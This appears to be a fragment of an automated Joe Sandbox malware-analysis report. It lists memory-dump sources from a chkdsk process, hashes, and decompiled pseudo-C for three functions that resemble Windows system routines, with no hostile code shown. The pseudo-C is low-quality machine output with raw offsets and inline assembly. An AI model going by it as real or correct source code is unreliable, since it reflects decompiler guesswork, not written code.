                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (10$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-1049297242
                                                      • Opcode ID: 880eaf9bda2c086d34a324533cff42d0dff7220f780649c24df7a37def62b808
                                                      • Instruction ID: 19c4488b3eeb6ca1cc8afabcfc3674070f78883fd8005fd72977927f12c64b63
                                                      • Opcode Fuzzy Hash: 880eaf9bda2c086d34a324533cff42d0dff7220f780649c24df7a37def62b808
                                                      • Instruction Fuzzy Hash: 76A1C071B00605CBEB26DF65CC907BAB3A5FF48724F05456EE986DB680EB34F8418B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E04E4E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E04E4BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E04E4BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E04E4AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04DC9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E04E4A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E04E4A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04DC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E04E4A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E04E4A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04DA2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E04D9B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E04D9FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04DA7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E04E3FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                      0x04e4e547
                                                      0x04e4e549
                                                      0x04e4e54f
                                                      0x04e4e553
                                                      0x04e4e557
                                                      0x04e4e55a
                                                      0x04e4e55c
                                                      0x04e4e55f
                                                      0x04e4e561
                                                      0x04e4e567
                                                      0x04e4e56b
                                                      0x04e4e7e2
                                                      0x00000000
                                                      0x04e4e571
                                                      0x04e4e575
                                                      0x04e4e577
                                                      0x04e4e57b
                                                      0x04e4e57c
                                                      0x04e4e57d
                                                      0x04e4e57e
                                                      0x04e4e57f
                                                      0x04e4e588
                                                      0x04e4e58f
                                                      0x04e4e591
                                                      0x04e4e592
                                                      0x04e4e592
                                                      0x04e4e596
                                                      0x04e4e59e
                                                      0x04e4e5a0
                                                      0x04e4e5a6
                                                      0x04e4e61d
                                                      0x04e4e61d
                                                      0x04e4e621
                                                      0x04e4e623
                                                      0x04e4e630
                                                      0x04e4e630
                                                      0x04e4e7e6
                                                      0x04e4e7eb
                                                      0x04e4e7ed
                                                      0x04e4e7f4
                                                      0x04e4e7fa
                                                      0x04e4e7ff
                                                      0x04e4e7ff
                                                      0x04e4e80a
                                                      0x04e4e812
                                                      0x04e4e812
                                                      0x04e4e5ab
                                                      0x04e4e5b4
                                                      0x04e4e5b9
                                                      0x04e4e5be
                                                      0x04e4e5c0
                                                      0x04e4e5c2
                                                      0x04e4e5c8
                                                      0x04e4e5c9
                                                      0x04e4e5cb
                                                      0x04e4e5cc
                                                      0x04e4e5d5
                                                      0x04e4e5e4
                                                      0x04e4e5f1
                                                      0x04e4e5f8
                                                      0x04e4e5f8
                                                      0x04e4e5d5
                                                      0x04e4e602
                                                      0x04e4e616
                                                      0x04e4e63d
                                                      0x04e4e644
                                                      0x04e4e64d
                                                      0x04e4e652
                                                      0x04e4e657
                                                      0x04e4e659
                                                      0x04e4e65b
                                                      0x04e4e661
                                                      0x04e4e662
                                                      0x04e4e664
                                                      0x04e4e665
                                                      0x04e4e66e
                                                      0x04e4e67d
                                                      0x04e4e68a
                                                      0x04e4e691
                                                      0x04e4e691
                                                      0x04e4e66e
                                                      0x04e4e6b0
                                                      0x00000000
                                                      0x04e4e6b6
                                                      0x04e4e6bd
                                                      0x04e4e6c7
                                                      0x04e4e6d7
                                                      0x04e4e6d9
                                                      0x04e4e6db
                                                      0x04e4e6de
                                                      0x04e4e6e3
                                                      0x04e4e6f3
                                                      0x04e4e6fc
                                                      0x04e4e700
                                                      0x04e4e700
                                                      0x04e4e704
                                                      0x04e4e70a
                                                      0x04e4e70a
                                                      0x04e4e713
                                                      0x04e4e716
                                                      0x04e4e719
                                                      0x04e4e720
                                                      0x04e4e761
                                                      0x04e4e76b
                                                      0x04e4e774
                                                      0x04e4e77a
                                                      0x04e4e77a
                                                      0x04e4e78a
                                                      0x04e4e791
                                                      0x04e4e799
                                                      0x04e4e79b
                                                      0x04e4e79f
                                                      0x04e4e7aa
                                                      0x04e4e7c0
                                                      0x04e4e7ac
                                                      0x04e4e7b2
                                                      0x04e4e7b9
                                                      0x04e4e7b9
                                                      0x04e4e7c7
                                                      0x04e4e806
                                                      0x00000000
                                                      0x04e4e7c9
                                                      0x04e4e7d1
                                                      0x04e4e7d8
                                                      0x00000000
                                                      0x04e4e7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e722
                                                      0x04e4e72e
                                                      0x04e4e748
                                                      0x04e4e74c
                                                      0x04e4e754
                                                      0x04e4e756
                                                      0x04e4e75c
                                                      0x04e4e75c
                                                      0x00000000
                                                      0x04e4e75c
                                                      0x04e4e758
                                                      0x04e4e758
                                                      0x00000000
                                                      0x04e4e758
                                                      0x04e4e750
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e752
                                                      0x00000000
                                                      0x04e4e752
                                                      0x04e4e730
                                                      0x04e4e735
                                                      0x04e4e73d
                                                      0x04e4e73f
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e741
                                                      0x04e4e741
                                                      0x00000000
                                                      0x04e4e741
                                                      0x04e4e739
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e73b
                                                      0x00000000
                                                      0x04e4e73b
                                                      0x04e4e722
                                                      0x04e4e720
                                                      0x04e4e6b0
                                                      0x04e4e618
                                                      0x00000000
                                                      0x04e4e618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: f0d7eee06c8d1dfbdc1821004ed0efc0d4233cb14dd2520ddb8e133a3f426897
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: A0916A326043419BE724CF29D845B6BB7E5BFC4728F14992DF999CA280E774F904CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E051BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E04E051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4e605f0);
				E04DDD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04E053CA(0);
						return E04DDD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04DCF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04DA3690(1, _t117, 0x4d61810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04DCAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04DA4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04DCAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04E0500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04DC9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                      0x04e051be
                                                      0x04e051c3
                                                      0x04e051c8
                                                      0x04e051cd
                                                      0x04e051d0
                                                      0x04e051d3
                                                      0x04e051d8
                                                      0x04e051db
                                                      0x04e051de
                                                      0x04e051e0
                                                      0x04e051e3
                                                      0x04e051e6
                                                      0x04e051e8
                                                      0x04e05342
                                                      0x04e05351
                                                      0x04e05356
                                                      0x04e0535a
                                                      0x04e05360
                                                      0x04e05363
                                                      0x04e05366
                                                      0x04e05369
                                                      0x04e05369
                                                      0x04e0536b
                                                      0x04e0536b
                                                      0x04e05370
                                                      0x04e053a3
                                                      0x04e053a4
                                                      0x04e053a6
                                                      0x04e053ab
                                                      0x04e053ab
                                                      0x04e053ae
                                                      0x04e053ae
                                                      0x04e053b5
                                                      0x04e053bf
                                                      0x04e053bf
                                                      0x04e05375
                                                      0x04e05396
                                                      0x04e053a0
                                                      0x04e053a0
                                                      0x00000000
                                                      0x04e05396
                                                      0x04e05377
                                                      0x04e05379
                                                      0x04e0537f
                                                      0x04e0538c
                                                      0x04e05390
                                                      0x00000000
                                                      0x04e05390
                                                      0x04e051ee
                                                      0x04e051f1
                                                      0x04e05301
                                                      0x04e05310
                                                      0x04e05315
                                                      0x04e05318
                                                      0x04e0531b
                                                      0x04e05320
                                                      0x04e0532e
                                                      0x04e05331
                                                      0x00000000
                                                      0x04e05331
                                                      0x04e05328
                                                      0x04e05329
                                                      0x00000000
                                                      0x04e05329
                                                      0x04e051fa
                                                      0x04e05235
                                                      0x04e05236
                                                      0x04e05239
                                                      0x04e0523f
                                                      0x04e05240
                                                      0x04e05241
                                                      0x04e05242
                                                      0x04e05246
                                                      0x04e05247
                                                      0x04e0524e
                                                      0x04e05251
                                                      0x04e05267
                                                      0x04e05269
                                                      0x04e0526e
                                                      0x04e0527d
                                                      0x04e0527e
                                                      0x04e05281
                                                      0x04e05282
                                                      0x04e05287
                                                      0x04e05288
                                                      0x04e0528a
                                                      0x04e0528f
                                                      0x04e05294
                                                      0x00000000
                                                      0x00000000
                                                      0x04e0529a
                                                      0x04e0529c
                                                      0x04e0529e
                                                      0x04e0529e
                                                      0x04e052a4
                                                      0x04e052b0
                                                      0x00000000
                                                      0x00000000
                                                      0x04e052ba
                                                      0x04e052bc
                                                      0x04e052bc
                                                      0x04e052d4
                                                      0x04e052d9
                                                      0x04e052dc
                                                      0x04e052e1
                                                      0x00000000
                                                      0x00000000
                                                      0x04e052e7
                                                      0x04e052f4
                                                      0x00000000
                                                      0x04e052f4
                                                      0x04e05270
                                                      0x00000000
                                                      0x04e05270
                                                      0x04e051fc
                                                      0x04e051fd
                                                      0x04e05202
                                                      0x04e05203
                                                      0x04e05205
                                                      0x04e0520a
                                                      0x04e0520f
                                                      0x00000000
                                                      0x00000000
                                                      0x04e0521b
                                                      0x04e05226
                                                      0x04e0522b
                                                      0x04e0521d
                                                      0x04e0521d
                                                      0x04e05222
                                                      0x04e05222
                                                      0x04e0522d
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 72884abe94876f5372844118a67405ce9254b4591bcef864ffef0f4acaae4d77
                                                      • Instruction ID: 473a25dcbc0285113baf6a39d6f57a6400813efd1befb49859367fd0e1980578
                                                      • Opcode Fuzzy Hash: 72884abe94876f5372844118a67405ce9254b4591bcef864ffef0f4acaae4d77
                                                      • Instruction Fuzzy Hash: 72518D71A00609AFDB24DFA8C840BBDBBF9FF48704F54942DE559EB281E671A940CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DAB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04DAB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4e7d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04DA7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04E58CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04DC9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04DCB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04DCCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04DA7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04E58F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04DCAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4e78628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4e7862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4e78628; // 0x0
							_t116 =  *0x4e7862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                      0x04dab94c
                                                      0x04dab956
                                                      0x04dab95c
                                                      0x04dab95e
                                                      0x04dab964
                                                      0x04dab969
                                                      0x04dab96d
                                                      0x04dab96d
                                                      0x04dab970
                                                      0x04dab974
                                                      0x04dab97a
                                                      0x04dabadf
                                                      0x04dabadf
                                                      0x04dabae2
                                                      0x04dabae4
                                                      0x04dabae6
                                                      0x04dabaf0
                                                      0x04df2cb8
                                                      0x04dabaf6
                                                      0x04dabaf6
                                                      0x04dabaf6
                                                      0x04dabafd
                                                      0x04dabb1f
                                                      0x04dabb1f
                                                      0x04dabaff
                                                      0x04dabb00
                                                      0x04dabb00
                                                      0x04dabb03
                                                      0x04dabb03
                                                      0x04dabacb
                                                      0x04dabacf
                                                      0x04dabad0
                                                      0x04dabad1
                                                      0x04dabadc
                                                      0x04dabadc
                                                      0x04dab980
                                                      0x04dab980
                                                      0x04dab988
                                                      0x04dab98b
                                                      0x04dab98d
                                                      0x04dab990
                                                      0x04dab993
                                                      0x04dab999
                                                      0x04dab99b
                                                      0x04dab9a1
                                                      0x04dab9a5
                                                      0x04dab9aa
                                                      0x04dab9b0
                                                      0x04dab9bb
                                                      0x04dab9c0
                                                      0x04dab9c3
                                                      0x04dab9ca
                                                      0x04dab9cc
                                                      0x04dab9cf
                                                      0x04dab9d3
                                                      0x04dab9d7
                                                      0x04daba94
                                                      0x04daba94
                                                      0x04daba98
                                                      0x04dabaa3
                                                      0x04df2ccb
                                                      0x04dabaa9
                                                      0x04dabaa9
                                                      0x04dabaa9
                                                      0x04dabab1
                                                      0x04df2cd5
                                                      0x04df2cdd
                                                      0x04df2cdd
                                                      0x04dababb
                                                      0x04dababc
                                                      0x04dabac2
                                                      0x04dabac3
                                                      0x04dabac3
                                                      0x04dabac6
                                                      0x00000000
                                                      0x04dab9dd
                                                      0x04dab9dd
                                                      0x04dab9e7
                                                      0x04dab9e7
                                                      0x04dab9ec
                                                      0x04dab9ec
                                                      0x04dab9f1
                                                      0x04dab9f5
                                                      0x04dab9fa
                                                      0x04daba00
                                                      0x04daba0c
                                                      0x04daba10
                                                      0x04daba10
                                                      0x04daba12
                                                      0x04daba18
                                                      0x00000000
                                                      0x00000000
                                                      0x04dabb26
                                                      0x04dabb26
                                                      0x04daba1e
                                                      0x04daba1e
                                                      0x04daba23
                                                      0x04daba25
                                                      0x04daba2c
                                                      0x04daba30
                                                      0x04daba35
                                                      0x04daba35
                                                      0x04daba41
                                                      0x04daba46
                                                      0x04daba4c
                                                      0x04daba50
                                                      0x04daba54
                                                      0x04daba6a
                                                      0x04daba6e
                                                      0x04daba70
                                                      0x04daba74
                                                      0x04daba78
                                                      0x04daba7a
                                                      0x04daba7c
                                                      0x04daba8e
                                                      0x04daba90
                                                      0x04daba92
                                                      0x04dabb14
                                                      0x04dabb14
                                                      0x04dabb16
                                                      0x04dabb16
                                                      0x00000000
                                                      0x04daba7c
                                                      0x04dabb0a
                                                      0x04dabb0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dabb0f

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DAB9A5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
